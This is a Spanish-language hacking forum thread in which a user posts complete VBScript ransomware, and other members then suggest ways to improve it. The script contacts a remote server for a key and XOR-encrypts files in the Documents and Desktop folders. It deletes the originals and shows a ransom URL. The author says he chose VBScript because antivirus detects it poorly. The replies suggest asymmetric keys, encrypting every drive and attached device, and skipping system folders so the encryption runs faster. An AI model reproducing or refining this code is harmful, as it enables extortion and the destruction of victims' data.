elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Codigo De Ransomware en VBScript por Flamer
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Codigo De Ransomware en VBScript por Flamer  (Leído 7,477 veces)
Flamer


Desconectado Desconectado

Mensajes: 1.052


crack, crack y mas crack...


Ver Perfil WWW
Codigo De Ransomware en VBScript por Flamer
« en: 28 Noviembre 2016, 20:18 pm »

Hola amigos aqui con un pequeño código que se me ocurrió hace unos días como cuando no hay nada que hacer y solo te vienen ideas de como joder mas al mundo jajajaja

Y me bino ala mente de crear un código en VBScript(ya que me gusta mas por su dificultad de detección por los AV) tipo ransomware

bueno así que ni mas ni menos aquí el código


Código
  1. option explicit
  2. dim shell,fso,document,f,password,desktop,id
  3.  
  4. set shell = createobject("wscript.shell")
  5. set fso = createobject("scripting.filesystemobject")
  6.  
  7. document = shell.SpecialFolders("MyDocuments")
  8. desktop = shell.SpecialFolders("Desktop")
  9.  
  10. set f = fso.getfolder(document)
  11. id = f.drive.serialnumber
  12.  
  13. password = Contrasena(id)
  14.  
  15. cifrar(document)
  16. cifrar(desktop)
  17.  
  18. msgbox "Para Recuperar Tus Archivos Ingresa a La Direccion:" & vbcrlf & vbcrlf & "http://practicashacking.net23.net/ransomware/Recover.php" & vbcrlf & vbcrlf & "Tu ID Es: " & id,,"Programa Finalizado"
  19.  
  20. function Contrasena(id)
  21.  dim objhttp
  22.  Set objhttp = createobject("Microsoft.XmlHttp")
  23.  
  24.  objhttp.open "POST","http://practicashacking.net23.net/ransomware/index.php",false
  25.  objhttp.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
  26.  objhttp.send "id=" & id
  27.  
  28.  Contrasena = objhttp.responsetext
  29. end function
  30.  
  31. function cifrar(ruta)
  32.   dim carpeta,listfiles,listfolders,f
  33.  
  34.   set carpeta = fso.getfolder(ruta)
  35.   set listfolders = carpeta.subfolders
  36.   set listfiles = carpeta.files
  37.  
  38.   for each f in listfiles
  39.      archivo(f.path)
  40.   next
  41.  
  42.   for each f in listfolders
  43.      cifrar(f.path)
  44.   next  
  45. end function
  46.  
  47. function archivo(path)
  48.   dim file,largo,i,f,b,p,n
  49.  
  50.   set file = fso.getfile(path)
  51.  
  52.   largo=file.size
  53.  
  54.   set f = file.OpenAsTextStream()
  55.   redim bytes(largo)
  56.  
  57.   n = 1
  58.  
  59.   for i=0 to largo - 1
  60.      if n = len(password) then
  61.     n = 1
  62.  else
  63.         n = n + 1  
  64.      end if  
  65.  p = asc(mid(password,n,1))
  66.      b = asc(f.read(1)) xor p
  67.  bytes(i) = chr(b)
  68.   next
  69.  
  70.   f.close  
  71.  
  72.   set f = fso.createtextfile(file.path & ".crypt")
  73.  
  74.   for n = 0 to i - 1
  75.      f.write(bytes(n))
  76.   next
  77.  
  78.   f.close
  79.   file.delete
  80. end function
  81.  
  82.  


saludos Flamer
« Última modificación: 19 Diciembre 2016, 03:09 am por Flamer » En línea

Mi Canal De Youtube y Blog

https://elblogdeflamer.blogspot.com

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: Codigo De Ransomware en VBScript por Flamer
« Respuesta #1 en: 29 Noviembre 2016, 01:16 am »

no se como se hace en vbs, pero en lugar de usas winrar, podrías abrir los archivos leerlos y reescribirlos cifrados (puede ser algo tan simple como un xor, no es nada de otro mundo y facil de conseguir la password si sabes algo de analisis criptografico y no corres el riesgo que el hdd está lleno y no se puedan crear los rar)

por otro lado la contraseña debe crearse en el server por practicidad
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
Flamer


Desconectado Desconectado

Mensajes: 1.052


crack, crack y mas crack...


Ver Perfil WWW
Re: Codigo De Ransomware en VBScript por Flamer
« Respuesta #2 en: 29 Noviembre 2016, 02:25 am »

no se como se hace en vbs, pero en lugar de usas winrar, podrías abrir los archivos leerlos y reescribirlos cifrados (puede ser algo tan simple como un xor, no es nada de otro mundo y facil de conseguir la password si sabes algo de analisis criptografico y no corres el riesgo que el hdd está lleno y no se puedan crear los rar)

por otro lado la contraseña debe crearse en el server por practicidad

en vbs hasta donde yo se no se pueden leer archivos binarios

y lo de la password no se por que en el servidor, ya que la clave es aleatoria

y si te refieres a eso de analizar los paquetes, si verán cuando envía la clave al servidor, pero si la recibe de el creo que también la verán no crees

saludos flamer

------------------EDITO------------
ya se leer binario en vbs, encontré un código en google, creo que corregiré el codigo
« Última modificación: 29 Noviembre 2016, 02:37 am por Flamer » En línea

Mi Canal De Youtube y Blog

https://elblogdeflamer.blogspot.com

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: Codigo De Ransomware en VBScript por Flamer
« Respuesta #3 en: 29 Noviembre 2016, 02:34 am »

bueno, lo que pasa es que normalmente se usa cifrado asimetrico, así que no importa que vean la clave de cifrado, pero el par de la clave se genera en el servidor y ninguna la pc lo sabe
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
Flamer


Desconectado Desconectado

Mensajes: 1.052


crack, crack y mas crack...


Ver Perfil WWW
Re: Codigo De Ransomware en VBScript por Flamer
« Respuesta #4 en: 19 Diciembre 2016, 03:14 am »

Actualizado el código ya no hace uso del winrar y la desventaja sigue siendo que ocupa internet en la pc victima.

esa desventaja se pude arreglar pero no quiero que al analizar el ransomware vean la generación de la clave

saludos Flamer y me falta una encriptacion asimetrica mientras sera via http
En línea

Mi Canal De Youtube y Blog

https://elblogdeflamer.blogspot.com

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: Codigo De Ransomware en VBScript por Flamer
« Respuesta #5 en: 19 Diciembre 2016, 05:42 am »

el ransomware puede tener una llave asimetrica estatica, eso no es problema, por lo menos no mientras no infecte a un punto que las compañias de AV decidan gastar dinero en romper tu clave XD
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
XKC

Desconectado Desconectado

Mensajes: 128



Ver Perfil
Re: Codigo De Ransomware en VBScript por Flamer
« Respuesta #6 en: 6 Enero 2017, 19:40 pm »

Parece bastante interesante este tema, y viendo tu codigo veo que haces algo asi:
Código:
cifrar(document)
cifrar(desktop)
¿No seria tambien recomendable cifrar todos los discos (c, D, etc.. incluso si pillas algun pendrive o demás)?, y como va a ser muy lento crear un array con una lista de directorios a excluir(los directorios que no guarden informacion del usuario) y asi aumentarias el numero de archivos infectados.
PD: ¿En windows cuales son los directorios no utiles?, es decir, los que no guardan info de usuario.¿Serian estos?¿Alguno mas?
  • C:\Program Files
  • C:\Program Files(x86)
  • C:\Windows
Saludos.
En línea

Para poder atacar y vencer con seguridad, ataca donde ellos no puedan defenderse.
Para defenderte y resistir firme, defiéndete en donde ellos no atacarán.
Flamer


Desconectado Desconectado

Mensajes: 1.052


crack, crack y mas crack...


Ver Perfil WWW
Re: Codigo De Ransomware en VBScript por Flamer
« Respuesta #7 en: 9 Enero 2017, 04:17 am »

hola XKC si ciframos los archivos de la carpeta windows y program files creo que dejaremos el sistema dañado y ese no es el objetivo del ransomware, si no es de que te paguen por el rescate de los archivos importantes del usuario y estos suelen guardarse en las carpetas de mis documentos y el escritorio.

pero creo que seria mejor modificar el código y que busque los archivos por extensión, pero creo que saldría algún inteligente y remplazaría las extensiones por otras inventadas así el ransomware no encriptaria nada....pero en fin estoy divagando

saludos Flamer y aparte esas carpetas que mencionas piden permisos, lo que si estaría bien es que encripte las unidades conectadas tambien
En línea

Mi Canal De Youtube y Blog

https://elblogdeflamer.blogspot.com

XKC

Desconectado Desconectado

Mensajes: 128



Ver Perfil
Re: Codigo De Ransomware en VBScript por Flamer
« Respuesta #8 en: 9 Enero 2017, 12:27 pm »

hola XKC si ciframos los archivos de la carpeta windows y program files creo que dejaremos el sistema dañado y ese no es el objetivo del ransomware, si no es de que te paguen por el rescate de los archivos importantes del usuario y estos suelen guardarse en las carpetas de mis documentos y el escritorio.

pero creo que seria mejor modificar el código y que busque los archivos por extensión, pero creo que saldría algún inteligente y remplazaría las extensiones por otras inventadas así el ransomware no encriptaria nada....pero en fin estoy divagando

saludos Flamer y aparte esas carpetas que mencionas piden permisos, lo que si estaría bien es que encripte las unidades conectadas tambien
No me has entendido bien, yo lo que queria decir es:
Usas un filtro para las estensiones cogiendo las utiles:
  • .zip
  • .doc
  • .txt
  • .pdf
  • etc...
Pero despues a parte, si por ejemplo tu a la funcion cifrar(que es recursiva) le pasas el parametro Desktop, solo cifrara lo que tenga el usuario en eses directorio y sus respectivos subdirectorios.Por ejemplo en este caso, solo afectaria a ese usuario, y si guarda las cosas en el disco D:\ y usa accesos directos, o las guarda en C:\, o que no todo lo tenga en esos directorios, ahi el ramsomware fallaria.
Entonces la cosa seria listar todos los discos del ordenador(C:\, D:\, E:\, etc..) y con un bucle ir llamandolos a todos respectivamente. Como ya has filtrado por extensiones no creo que corras el riesgo de dejar inutil el sistema operativo.
Aun asi tiene s el problema de que todo el ordenador(sobre todo donde esta instalado el SO es muy grande y quizas tarde mucho en recorrerlo todo), para ello he pensado que se podrian excluir algunos directorios y subdirectorios tal que asi:
  • Creas un array global que almacene dominios no validos(1)
  • En la funcion cifrar si la ruta actual es igual a laguno de esos dominios le haces un return, para que pare y no busque mas ahi
Asi de esta manera no anda buscando nada en directorios que no va a encontrar nada, es decir, lo optimizamos para que tarde menos.
No se si es buena ida hacer esto, de todas maneras si fuera asi ¿que directorios excluiriais vosotros?:
  • C:\Program Files
  • C:\Program Files(x86)
  • C:\Windows
Saludos.
En línea

Para poder atacar y vencer con seguridad, ataca donde ellos no puedan defenderse.
Para defenderte y resistir firme, defiéndete en donde ellos no atacarán.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
VBScript: Angry Birds Pong in VBScript [HTA + VBS] (100% Notepad) by JohnConnor
Scripting
JohnConnor 1 5,407 Último mensaje 4 Marzo 2013, 23:34 pm
por dato000
Ayuda en código vbscript
Scripting
eddergui 6 3,720 Último mensaje 22 Enero 2016, 22:37 pm
por eddergui
Se consigue descifrar el código del ransomware CryptXXX
Noticias
wolfbcn 0 1,616 Último mensaje 28 Abril 2016, 14:29 pm
por wolfbcn
Ransomware de codigo abierto « 1 2 »
Foro Libre
Poyoncio 11 5,660 Último mensaje 19 Agosto 2016, 22:55 pm
por AlbertoBSD
Código simple para hacer La Quiniela (VBScript,VB, VB.Net, C#)
Programación General
okik 0 5,287 Último mensaje 10 Diciembre 2016, 15:43 pm
por okik
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines